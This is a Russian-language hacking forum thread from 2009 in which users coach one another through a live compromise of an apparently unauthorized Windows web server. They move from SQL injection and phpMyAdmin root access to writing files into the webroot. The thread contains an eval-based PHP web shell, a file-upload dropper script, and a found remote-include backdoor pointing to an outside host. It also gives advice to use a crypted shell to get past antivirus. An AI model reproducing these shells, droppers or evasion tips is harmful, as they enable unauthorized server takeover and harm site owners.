ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.09.2009, 19:42
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230
Репутация:
462
|
|
При выводе из БД выдаёт такие символы:
Код:
lIlIllIIIlllIIllIIlIlllllllIIIIlIlI
причём только из колонок username И password 
никто не сталкивался? |
|
|
07.09.2009, 19:45
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
могут фильтроваться колоки, или быть обманками (пустая колонка, или забитая фигней) еще можно поиграться с лимитом!!! Но я точно не знаю
Если не трудно кинь скуль в лс я гляну)))
Последний раз редактировалось [x60]unu; 07.09.2009 в 20:02..
|
|
|
|
08.09.2009, 00:00
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Есть рут доступ к phpmyadmin
для раскрытия пути использовал точку после пхп сесии.
выдало мне это
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1PHP Notice: Undefined variable: id in D:\name1\sname2\www\file.php on line 6
Далее захожу в phpmyadmin выполняю,
Код:
SELECT load_file( 'D:\name1\sname2\www\file.php' ) ;
ответ NULL,(и другие файлы пробовал такая же фигня)я понял уже что замута с путями,что не так вышло я не пойму 
спасибо! |
|
|
|
08.09.2009, 01:21
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780
Репутация:
585
|
|
Shadrin
Используй в записи пути к файлу прямые слеши, а не обратные.
|
|
|
|
08.09.2009, 02:15
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
спасибо cr0w
в файл пишет и вижу такой код
Код:
<? @include("http://xxx.narod.ru/a.txt"); ?>
это я как понимаю у него прав на выполнение нету?попробовал несколько папок такая фигня везде |
|
|
|
08.09.2009, 02:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал?
<?eval($_GET[e]);?> - в файл
http://сайт/путь к файлу/файл.php?e=phpinfo();
PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши.
НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.
Последний раз редактировалось Pashkela; 08.09.2009 в 02:28..
|
|
|
|
08.09.2009, 02:52
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Сообщение от Pashkela
а в файл чонить попроще нельзя написать? И что значит "у него прав на выполнение нету"? Ты реально это просто почуствовал?
<?eval($_GET[e]);?> - в файл
http://сайт/путь к файлу/файл.php?e=phpinfo();
PS: А для начала хотя бы просто <?php phpinfo();?> в файло запиши.
НЕТ, нам сразу нужно удаленно чото инклудить. На 90% серваков allow_url_include отключен нафиг. Думайте головой уже, сначала хоть что-то простейшее на php загрузите, потом уже делайте выводы.
Записал <?php phpinfo();?> вижу инфо пхп
Записал <?eval($_GET[e]);?> ,при запросе файл.php?e=phpinfo(); вижу в пустую стариницу
и исходном коде <?eval($_GET[e]);?>
Последний раз редактировалось Shadrin; 08.09.2009 в 02:55..
|
|
|
|
08.09.2009, 02:58
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Записал <?php phpinfo();?> вижу инфо пхп
о, молодца, дальше почитай phpinfo, который выводится, там много интересного и познавательного можно увидеть.
Попробуй залить теперь вместо <?phpinfo();?> такую приблудку:
<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?>
запусти и попробуй залить сразу рабочий шелл с компа прямо, или не шелл, картинку например, главное залить
PS: Шеллы лить - не рутина, но ребус
Учитывая, что винда - большая вероятность антивируса, скорее всего придется искать "нормально" криптованный шелл, а не с99 стандартный из паблика. Сам у себя запусти AV и попробуй обратиться к шеллу, который льешь, например просто открыть его в ноутпаде.
если попалась стандартная ситуация - повезло. Но везет не всегда.
Последний раз редактировалось Pashkela; 08.09.2009 в 03:04..
|
|
|
|
08.09.2009, 03:17
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
спасибо!хороший скрипт,тока он не хочет заливать шел,а выполняеться,а на своем хосте все норм
там сервер на винде может из за этого,у меня бывают с ними проблемы 
Последний раз редактировалось Shadrin; 08.09.2009 в 03:29..
|
|
|
|
08.09.2009, 03:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Ищи нормальный криптованный шелл, вот что я тебе могу сказать напоследок. Если работает phpinfo - значит дело в шляпе.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1507037){kind=avatar}
Линейный вид
